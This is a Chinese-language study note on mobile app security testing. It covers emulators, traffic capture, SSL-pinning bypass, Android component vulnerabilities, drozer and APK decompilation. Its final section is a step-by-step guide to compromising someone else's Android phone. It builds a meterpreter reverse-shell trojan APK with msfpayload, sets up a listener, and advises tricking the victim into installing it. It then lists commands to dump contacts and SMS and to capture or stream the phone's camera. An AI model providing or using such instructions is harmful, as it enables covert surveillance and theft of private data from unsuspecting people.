web安全之移动端安全
基础
模拟器:夜神/蓝手指BlueStacks、MuMu模拟器、
抓包器:burpsuite、Fidder
adb连接 pc-cli调试模拟器 夜神-62001端口
APP安全测试流程
1 信息收集:域名、子域名、DNS地址、后台地址。
2 APP应用层渗透:
类似web渗透流程!无法漏扫——只能抓包分析。
抓包方法:物理机无线开启代理、模拟器无线开启代理、bp抓包!
注:无法抓包,SSL证书预绑定并连接时需校验怎么办?绕过证书检查——安装xposed框架+JustTrustMe组件。
3 四大组件渗透:四大组件 权限声明项,分别对应操作系统功能
activity 用户操作的可视化界面 生命周期running/paused/stoped/detroyed 漏洞 组件导出漏洞
service 后台运行 模式started/bound 漏洞 权限提升、拒绝服务等
broadcast receive 广播接收 注册方式 静态注册、动态注册
漏洞 组件导出漏洞
content providers 数据共享接口 主要方法(略) 漏洞 读写权限漏洞、SQL注入漏洞、目录遍历漏洞 URI content://com.apkname:path/
工具篇drozer
Android安全测试框架
pc安装服务端、模拟器里安装客户端
CLI:run app.conpententname.info -a apkname
apk反编译
原理:源码——加壳(xml文件)——编译成apk。
xml文件:apk改之理、apktool
dex文件:Dex2Jar软件、JD-GUI软件
ddms
APP开发
Hbuilder编译器
入侵安卓手机
首先入侵手机的原理是 你需要生成一个安卓手机的木马程序xxx.apk 安卓安装程序安装到你的手机上去。
然后运行这个安卓程序。然后这个木马就会反弹连接你的电脑,然后你就可以控制他的手机了,原理就这些
首先条件就是
1 网络能够联通,手机木马反连接你 他的手机首先能上网,你的ip得是外网ip,如果在内网也可以。
2 你需要想办法让他安装你生成的木马并运行。就ok了
步骤1
生成木马程序 192.168.1.105 我的电脑ip 7777是反连接我的端口号,不能用已经使用的端口号。
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=7777 R > /root/cracer.apk
生成木马的位置名字cracer.apk
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.105
exploit
打开msf用来侦听反连接的木马
ok 生成完毕了 吧生成好的木马拿出来发给手机
我安装上安卓木马
安装完打开
我们看侦听的结果
ok 我打开木马
反链我了
dump_contacts????--这个是导出电话
dump_sms --这个是导出信息
Webcam_list可以看到有几个摄像头
-i 1 是选择后摄像头
webcam_snap 是拍照 ,看到我电脑了
webcam_stream 开启摄像头
ok 就演示这些给大家
其他功能你们去实验下吧